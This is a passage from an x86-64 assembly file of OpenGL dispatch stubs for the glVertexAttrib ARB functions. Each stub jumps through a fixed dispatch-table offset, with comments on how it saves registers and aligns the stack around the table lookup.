	movq	3808(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3808(%rax), %r11
	jmp	*%r11
1:
	subq	$40, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	movq	%xmm2, 24(%rsp)
	call	_glapi_get_dispatch
	movq	24(%rsp), %xmm2
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$40, %rsp
	movq	3808(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib3fARB), .-GL_PREFIX(VertexAttrib3fARB)
/* glVertexAttrib3fvARB dispatch stub: tail-jumps through byte offset
   3816 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib3fvARB)
	.type GL_PREFIX(VertexAttrib3fvARB), @function
GL_PREFIX(VertexAttrib3fvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3816(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3816(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3816(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3816(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib3fvARB), .-GL_PREFIX(VertexAttrib3fvARB)
/* glVertexAttrib3sARB dispatch stub: tail-jumps through byte offset
   3824 of the current dispatch table.  Non-TLS paths preserve the
   integer argument registers %rdi/%rsi/%rdx/%rcx across the lookup
   call; the extra %rbp push is stack padding only (keeps %rsp 16-byte
   aligned at the call), not a frame pointer.  Fallback uses the cached
   _glapi_Dispatch pointer, calling _glapi_get_dispatch only when the
   cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib3sARB)
	.type GL_PREFIX(VertexAttrib3sARB), @function
GL_PREFIX(VertexAttrib3sARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3824(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3824(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3824(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3824(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib3sARB), .-GL_PREFIX(VertexAttrib3sARB)
/* glVertexAttrib3svARB dispatch stub: tail-jumps through byte offset
   3832 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib3svARB)
	.type GL_PREFIX(VertexAttrib3svARB), @function
GL_PREFIX(VertexAttrib3svARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3832(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3832(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3832(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3832(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib3svARB), .-GL_PREFIX(VertexAttrib3svARB)
/* glVertexAttrib4NbvARB dispatch stub: tail-jumps through byte offset
   3840 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4NbvARB)
	.type GL_PREFIX(VertexAttrib4NbvARB), @function
GL_PREFIX(VertexAttrib4NbvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3840(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3840(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3840(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3840(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4NbvARB), .-GL_PREFIX(VertexAttrib4NbvARB)
/* glVertexAttrib4NivARB dispatch stub: tail-jumps through byte offset
   3848 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4NivARB)
	.type GL_PREFIX(VertexAttrib4NivARB), @function
GL_PREFIX(VertexAttrib4NivARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3848(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3848(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3848(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3848(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4NivARB), .-GL_PREFIX(VertexAttrib4NivARB)
/* glVertexAttrib4NsvARB dispatch stub: tail-jumps through byte offset
   3856 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4NsvARB)
	.type GL_PREFIX(VertexAttrib4NsvARB), @function
GL_PREFIX(VertexAttrib4NsvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3856(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3856(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3856(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3856(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4NsvARB), .-GL_PREFIX(VertexAttrib4NsvARB)
/* glVertexAttrib4NubARB dispatch stub: tail-jumps through byte offset
   3864 of the current dispatch table.  Non-TLS paths preserve the five
   integer argument registers %rdi/%rsi/%rdx/%rcx/%r8 across the lookup
   call (five pushes also keep %rsp 16-byte aligned at the call).
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4NubARB)
	.type GL_PREFIX(VertexAttrib4NubARB), @function
GL_PREFIX(VertexAttrib4NubARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3864(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3864(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3864(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3864(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4NubARB), .-GL_PREFIX(VertexAttrib4NubARB)
/* glVertexAttrib4NubvARB dispatch stub: tail-jumps through byte offset
   3872 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4NubvARB)
	.type GL_PREFIX(VertexAttrib4NubvARB), @function
GL_PREFIX(VertexAttrib4NubvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3872(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3872(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3872(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3872(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4NubvARB), .-GL_PREFIX(VertexAttrib4NubvARB)
/* glVertexAttrib4NuivARB dispatch stub: tail-jumps through byte offset
   3880 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4NuivARB)
	.type GL_PREFIX(VertexAttrib4NuivARB), @function
GL_PREFIX(VertexAttrib4NuivARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3880(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3880(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3880(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3880(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4NuivARB), .-GL_PREFIX(VertexAttrib4NuivARB)
/* glVertexAttrib4NusvARB dispatch stub: tail-jumps through byte offset
   3888 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4NusvARB)
	.type GL_PREFIX(VertexAttrib4NusvARB), @function
GL_PREFIX(VertexAttrib4NusvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3888(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3888(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3888(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3888(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4NusvARB), .-GL_PREFIX(VertexAttrib4NusvARB)
/* glVertexAttrib4bvARB dispatch stub: tail-jumps through byte offset
   3896 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4bvARB)
	.type GL_PREFIX(VertexAttrib4bvARB), @function
GL_PREFIX(VertexAttrib4bvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3896(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3896(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3896(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3896(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4bvARB), .-GL_PREFIX(VertexAttrib4bvARB)
/* glVertexAttrib4dARB dispatch stub: tail-jumps through byte offset
   3904 of the current dispatch table.  Non-TLS paths spill the live
   argument registers %rdi and %xmm0-%xmm3 to a 40-byte frame around
   the lookup call (fully used; keeps %rsp 16-byte aligned at the
   call).  Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4dARB)
	.type GL_PREFIX(VertexAttrib4dARB), @function
GL_PREFIX(VertexAttrib4dARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3904(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$40, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	movq	%xmm2, 24(%rsp)
	movq	%xmm3, 32(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	32(%rsp), %xmm3
	movq	24(%rsp), %xmm2
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$40, %rsp
	movq	3904(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3904(%rax), %r11
	jmp	*%r11
1:
	subq	$40, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	movq	%xmm2, 24(%rsp)
	movq	%xmm3, 32(%rsp)
	call	_glapi_get_dispatch
	movq	32(%rsp), %xmm3
	movq	24(%rsp), %xmm2
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$40, %rsp
	movq	3904(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4dARB), .-GL_PREFIX(VertexAttrib4dARB)
/* glVertexAttrib4dvARB dispatch stub: tail-jumps through byte offset
   3912 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4dvARB)
	.type GL_PREFIX(VertexAttrib4dvARB), @function
GL_PREFIX(VertexAttrib4dvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3912(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3912(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3912(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3912(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4dvARB), .-GL_PREFIX(VertexAttrib4dvARB)
/* glVertexAttrib4fARB dispatch stub: tail-jumps through byte offset
   3920 of the current dispatch table.  Non-TLS paths spill the live
   argument registers %rdi and %xmm0-%xmm3 to a 40-byte frame around
   the lookup call (fully used; keeps %rsp 16-byte aligned at the
   call).  Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4fARB)
	.type GL_PREFIX(VertexAttrib4fARB), @function
GL_PREFIX(VertexAttrib4fARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3920(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$40, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	movq	%xmm2, 24(%rsp)
	movq	%xmm3, 32(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	32(%rsp), %xmm3
	movq	24(%rsp), %xmm2
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$40, %rsp
	movq	3920(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3920(%rax), %r11
	jmp	*%r11
1:
	subq	$40, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	movq	%xmm1, 16(%rsp)
	movq	%xmm2, 24(%rsp)
	movq	%xmm3, 32(%rsp)
	call	_glapi_get_dispatch
	movq	32(%rsp), %xmm3
	movq	24(%rsp), %xmm2
	movq	16(%rsp), %xmm1
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$40, %rsp
	movq	3920(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4fARB), .-GL_PREFIX(VertexAttrib4fARB)
/* glVertexAttrib4fvARB dispatch stub: tail-jumps through byte offset
   3928 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4fvARB)
	.type GL_PREFIX(VertexAttrib4fvARB), @function
GL_PREFIX(VertexAttrib4fvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3928(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3928(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3928(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3928(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4fvARB), .-GL_PREFIX(VertexAttrib4fvARB)
/* glVertexAttrib4ivARB dispatch stub: tail-jumps through byte offset
   3936 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4ivARB)
	.type GL_PREFIX(VertexAttrib4ivARB), @function
GL_PREFIX(VertexAttrib4ivARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3936(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3936(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3936(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3936(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4ivARB), .-GL_PREFIX(VertexAttrib4ivARB)
/* glVertexAttrib4sARB dispatch stub: tail-jumps through byte offset
   3944 of the current dispatch table.  Non-TLS paths preserve the five
   integer argument registers %rdi/%rsi/%rdx/%rcx/%r8 across the lookup
   call (five pushes also keep %rsp 16-byte aligned at the call).
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4sARB)
	.type GL_PREFIX(VertexAttrib4sARB), @function
GL_PREFIX(VertexAttrib4sARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3944(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3944(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3944(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	3944(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4sARB), .-GL_PREFIX(VertexAttrib4sARB)
/* glVertexAttrib4svARB dispatch stub: tail-jumps through byte offset
   3952 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4svARB)
	.type GL_PREFIX(VertexAttrib4svARB), @function
GL_PREFIX(VertexAttrib4svARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3952(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3952(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3952(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3952(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4svARB), .-GL_PREFIX(VertexAttrib4svARB)
/* glVertexAttrib4ubvARB dispatch stub: tail-jumps through byte offset
   3960 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4ubvARB)
	.type GL_PREFIX(VertexAttrib4ubvARB), @function
GL_PREFIX(VertexAttrib4ubvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3960(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3960(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3960(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3960(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4ubvARB), .-GL_PREFIX(VertexAttrib4ubvARB)
/* glVertexAttrib4uivARB dispatch stub: tail-jumps through byte offset
   3968 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
	.globl GL_PREFIX(VertexAttrib4uivARB)
	.type GL_PREFIX(VertexAttrib4uivARB), @function
GL_PREFIX(VertexAttrib4uivARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3968(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3968(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3968(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3968(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(VertexAttrib4uivARB), .-GL_PREFIX(VertexAttrib4uivARB)
/* glVertexAttrib4usvARB dispatch stub: tail-jumps through byte offset
   3976 of the current dispatch table.  Non-TLS paths preserve
   %rdi/%rsi across the lookup call; the %rbp push is stack padding only
   (keeps %rsp 16-byte aligned at the call), not a frame pointer.
   Fallback uses the cached _glapi_Dispatch pointer, calling
   _glapi_get_dispatch only when the cache is still NULL. */
	.p2align	4,,15
